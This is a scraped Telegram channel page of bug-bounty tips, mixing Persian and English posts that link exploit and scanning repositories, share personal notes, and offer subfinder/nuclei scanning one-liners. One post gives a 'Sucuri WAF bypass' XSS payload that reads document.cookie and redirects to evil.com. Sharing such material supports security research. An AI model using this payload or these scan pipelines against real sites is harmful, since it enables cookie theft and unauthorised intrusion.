Bugbounty Tips
Open in Telegram
2 905
Subscribers
No data24 hours
-67 days
-1930 days
Posts Archive
2 905
CyberPanel-RCE
https://github.com/DreyAnd/CyberPanel-RCE
For more join to channel (:
https://t.me/rootdr_research
#exploit
#Bugbounty
2 905
🐞 Party🥳🥳
به همه عوامل برگذارکنندگان این رویداد خسته نباشید میگم تا اینجا خیلی خوش گذشته✌️
For more join to channel (:
https://t.me/rootdr_research
2 905
🐞 Party🥳🥳
از همه عوامل برگذارکنندگان این رویداد خسته نباشید میگم تا اینجا خیلی خوش گذشته✌️
For more join to channel (:
https://t.me/rootdr_research
2 905
Logger++ Custom Filters
A comprehensive list of custom filters for Logger++ to identify various #vulnerabilities in different #API styles
https://github.com/bnematzadeh/LoggerPlusPlus-API-Filters
For more join to channel (:
https://t.me/rootdr_research
#LINK
#bugbounty
2 905
سلام دوستان برای Email Verification bypass یک ویدیو براتون آماده کردم که روی برنامه پابلیک هکروان بود
(https://hackerone.com/opensea?type=team)
با توضیحات آسیب پذیری که تجربه یک سناریو ساده و کاربردی رو بهتون انتقال میده، امیدوارم براتون مفید باشه
تایتل آسیب پذیری:
Email Verification Bypass
For more join to channel (:
https://t.me/rootdr_research
#Video
#Writeup
2 905
Sucuri WAF Bypass:
payload:
<a aa aaa aaaa aaaaaa href=javascript:alert(document.cookie)>ClickMe
<a href="javascript:alert('Sucuri WAF Bypassed ! ' + document.domain + '\nCookie: ' + document.cookie); window.location.href='https://evil.com';">ClickMe</a>For more join to channel (: https://t.me/rootdr_research #LINK #WEB
2 905
دوستان کار نشد نداره حتی کمپانی که بزرگه تیم امنیت داره و... هم میتونه آسیب پذیری های خطرناکی داشته باشه چه بسا تیم داخلی بصورت وایت باکس و بلک باکس تست کنه و همچنین پنتست سالینه خارج از سازمان بشه،اسکیلاتونو لول آپ کنین
عمیق بشین توی آسیب پذیری ها و ذهنیت هکر داشته باشه باشین،توی باگ بانتی چون که قبلش تیم های امنیت و پروژه های تست نفوذ خارجی روی asset انجام میشه، اگر بروز و عمیق نباشید نتیجه دلخواه رو نمیگیرین..
2 905
سلام دوستان
یکسری از بچه ها بابت کلاس و تدریس از من پرسیدن
من دوره برگذار نمیکنم درگیرم وقتشو ندارم ولی اگه کسی خواست یه گفت و گو و مشورتی داشته باشه میتونم در حد یکی دو جلسه باهاش میتینگ آنلاین داشته باشم برای رفع اشکال و دید دادن توی پروسه باگ بانتی
اگر کسی خواست بهم پیم بده باهاش صحبت کنم
ظرفیت زیادی هم از نظر زمانی ندارم شاید بتونم دو الی سه نفر پر کنم که یکیش رزرو شده
اگر خواستین بهم پیم بدین
@RootDr
2 905
https://github.com/coffinxp/nuclei-templates
how to use in bug bounty programs:
subfinder -d xyz.com -all | nuclei -t crlf.yaml -rl 50
subfinder -d xyz.com -all | nuclei -t openRedirect.yaml -rl 100
subfinder -d xyz.com -all | nuclei -t iis.yaml
subfinder -d xyz.com -all | nuclei -t cors.yaml -rl 100
subfinder -d xyz.com -all | waybackurls | gf sqli | uro | nuclei -t errorsqli.yaml -rl 50
For more join to channel (:
https://t.me/rootdr_research
#LINK
#WEB
2 905
با سلام دوستان
من open to work هستم، موقعیت شغلی مناسبی داشتید در یزد به صورت حضوری و ریموت در هر شهری در خدمتتون هستم.
T.me//RootDr
اشتراک گذاریش خالی از لطف نیست متشکرم ازتون پیشاپیش🙏❤️
2 905
یک چنل با محتوای بدرد بخور:
https://t.me/bugbounty_poc
ویدیو اثبات آسیب پذیری هارو به اشتراک میزاره و بنظرم خیلی میتونه کمک خوبی باشه.
For more join to channel (:
https://t.me/rootdr_research
#LINK
#WEB
2 905
یکی از تیم های ایرانی در حال توسعه یک پلتفرمی هستش که آنلاین این فیچر هارو تست میکنه و خروجی خیلی خوبی میده، این پلتفرم بتا و درحال تغییره و بنظرم پروژه خوبیه حتما ازش استفاده کنید.
Recon
Vulnerability Detection
Github Detective
URL Crawler
همراه با خروجی مناسب
پیشنهاد میشه سر بزنید و نظرتونو بگید زیر همین پست، توی چنل هستن نظراتو میخونن و مطابق با نیازها مشکل هارو فیکس میکنند و کیفیت رو ارتقا میدند.
https://hackerium.io
For more join to channel (:
https://t.me/rootdr_research
#bugbounty
#web
#Pentest
2 905
بچه ها این رایتاپ تیم دوم مسابقات المپیک راوین در مرحله مقدماتیه
پ.ن: ASIS خشن مینوازد😂😂
